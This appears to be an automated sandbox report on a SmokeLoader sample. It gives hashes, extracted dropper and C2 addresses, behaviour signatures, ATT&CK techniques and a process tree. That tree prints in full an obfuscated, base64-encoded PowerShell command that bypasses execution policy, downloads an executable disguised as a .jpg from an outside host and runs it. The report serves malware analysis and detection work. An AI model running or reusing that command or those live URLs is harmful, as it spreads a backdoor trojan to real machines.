Analysis

  • max time kernel
    23s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    13-04-2021 07:53

General

  • Target

    9fbd32c6bb25f6a660696fa9830c5040.exe

  • Size

    847KB

  • MD5

    9fbd32c6bb25f6a660696fa9830c5040

  • SHA1

    1e41347d36792e823a8982b10170d83a0722e3cc

  • SHA256

    5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

  • SHA512

    3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://u.teknik.io/28oLW.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.115.43/1/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe
    "C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:708
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
          "C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
          4⤵
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Suspicious behavior: MapViewOfSection
          PID:3300

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    b751492c41c6f3173d3b6f31c1b9b4eb

    SHA1

    abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

    SHA256

    ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

    SHA512

    afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    3e03c7b392a4224a4d9f108bc2c024a9

    SHA1

    0b0fdcf73bc4d55eafb2de7ceba044ae22b64aae

    SHA256

    a76c4fc3f225de3674870f375c709443bfc0580d80425d2347be509449ce73fe

    SHA512

    a70ab6f08257ef162c654c767fb0f189b2c5e51e2623b66163fe57082c856c3bd3d4c5778e22489151fa4ff8c57294a8ac5b6e94d10a49f83d25e6ba216827bf

  • C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
    MD5

    0d1334075336455a13a36fd909417556

    SHA1

    4f1937f0eeeb697ef992547701295134fde65c20

    SHA256

    33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

    SHA512

    d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

  • C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
    MD5

    0d1334075336455a13a36fd909417556

    SHA1

    4f1937f0eeeb697ef992547701295134fde65c20

    SHA256

    33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

    SHA512

    d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

  • memory/2020-146-0x0000000009570000-0x0000000009571000-memory.dmp
    Filesize

    4KB

  • memory/2020-155-0x000000000A0F0000-0x000000000A0F1000-memory.dmp
    Filesize

    4KB

  • memory/2020-154-0x00000000069D0000-0x00000000069D1000-memory.dmp
    Filesize

    4KB

  • memory/2020-153-0x0000000009140000-0x0000000009141000-memory.dmp
    Filesize

    4KB

  • memory/2020-148-0x0000000006983000-0x0000000006984000-memory.dmp
    Filesize

    4KB

  • memory/2020-147-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
    Filesize

    4KB

  • memory/2020-128-0x0000000000000000-mapping.dmp
  • memory/2020-139-0x0000000006980000-0x0000000006981000-memory.dmp
    Filesize

    4KB

  • memory/2020-140-0x0000000006982000-0x0000000006983000-memory.dmp
    Filesize

    4KB

  • memory/3032-168-0x0000000002DE0000-0x0000000002DF5000-memory.dmp
    Filesize

    84KB

  • memory/3032-167-0x0000000000E80000-0x0000000000E81000-memory.dmp
    Filesize

    4KB

  • memory/3300-160-0x0000000000000000-mapping.dmp
  • memory/4064-127-0x0000000007FD0000-0x0000000007FD1000-memory.dmp
    Filesize

    4KB

  • memory/4064-126-0x0000000007B50000-0x0000000007B51000-memory.dmp
    Filesize

    4KB

  • memory/4064-125-0x0000000007B20000-0x0000000007B21000-memory.dmp
    Filesize

    4KB

  • memory/4064-124-0x00000000077D0000-0x00000000077D1000-memory.dmp
    Filesize

    4KB

  • memory/4064-123-0x0000000007760000-0x0000000007761000-memory.dmp
    Filesize

    4KB

  • memory/4064-114-0x0000000000000000-mapping.dmp
  • memory/4064-122-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
    Filesize

    4KB

  • memory/4064-121-0x0000000006F60000-0x0000000006F61000-memory.dmp
    Filesize

    4KB

  • memory/4064-120-0x0000000004472000-0x0000000004473000-memory.dmp
    Filesize

    4KB

  • memory/4064-119-0x0000000006FC0000-0x0000000006FC1000-memory.dmp
    Filesize

    4KB

  • memory/4064-169-0x0000000004473000-0x0000000004474000-memory.dmp
    Filesize

    4KB

  • memory/4064-118-0x0000000004400000-0x0000000004401000-memory.dmp
    Filesize

    4KB

  • memory/4064-117-0x0000000004470000-0x0000000004471000-memory.dmp
    Filesize

    4KB

  • memory/4064-170-0x0000000004474000-0x0000000004476000-memory.dmp
    Filesize

    8KB